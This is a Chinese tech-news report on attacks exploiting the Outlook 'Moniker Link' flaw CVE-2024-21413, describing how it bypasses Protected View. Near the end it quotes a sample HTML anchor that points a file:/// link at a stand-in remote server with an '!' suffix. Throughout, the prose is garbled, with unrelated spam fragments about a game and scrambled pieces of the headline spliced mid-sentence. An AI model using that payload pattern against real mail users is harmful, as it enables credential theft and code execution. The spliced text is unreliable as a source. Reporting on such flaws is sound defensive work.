已有黑客利用Outlook漏洞展开攻击 只需打开带有恶意链接的邮件即可触发漏洞 – 蓝点网

#安全资讯 已经有黑客开始利用 Outlook 漏洞展开攻击，已有有恶意链邮件只需打开带有恶意链接的黑客电子邮件即可触发漏洞。该漏洞在 2024 年 1 月修复，利用k漏漏洞蓝点cbg倩女幽魂（倩女幽魂17173）直到现在才有黑客利用也不让人惊讶，洞展如果到现在用户还没升级版本那只能自求多福了。开攻开带查看全文：https://www.8ec.cn/107785

CVE-2024-21413 漏洞是击只接的即微软在 2024 年 1 月公布并修复的安全漏洞，该漏洞由网络安全公司 CheckPoint 安全研究人员 Haifei Li 发现并通报给微软，需打主要涉及到 Outlook 邮件客户端的已有有恶意链邮件远程代码执行问题。

该漏洞影响 Microsoft Office 2016、黑客Microsoft Office 2019、利用k漏漏洞蓝点cbg倩女幽魂（倩女幽魂17173）Microsoft Office LTSC 2021、洞展Microsoft 365 企业版应用，开攻开带漏洞评分达到 9.8/10 分。击只接的即

这枚漏洞的描述是存在缺陷的 Outlook 版本打开带有恶意链接的电子邮件时输入验证不当，借助漏洞黑客可以绕过受保护的已有有恶意链邮件视图 (该视图会以只读方式打开 Office 文件用来阻挡嵌入的有害内容) 并以编辑模式打开恶意的 Office 文件。

在这种情况下黑客可以向目标组织发送包含恶意代码的钓鱼邮件，只需要目标组织的员工打开该邮件即可触发漏洞并实现远程代码执行，因此造成的危害还是非常大的。

目前已经有黑客开始利用这枚漏洞展开攻击，考虑到其潜在危害性，如果企业至今没有升级 Outlook 版本封堵漏洞那可能会出现严重的安全问题。

CheckPoint 的研究人员也透露了该漏洞的工作方式：

这个被称为 Moniker Link 的漏洞可以让黑客使用 file:// 文件协议指向黑客控制的服务器 URL 并添加感叹号来绕过 Outlook 内置的受保护视图。

#下面为示例代码，基于安全考虑研究人员并未公布完整的利用方式*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

考虑到这枚漏洞已经公布 1 年了，这时候才有黑客利用也不是让人惊讶的事情，如果都 1 年了企业还没有更新 Outlook 封堵漏洞那也只能自求多福了。

最新评论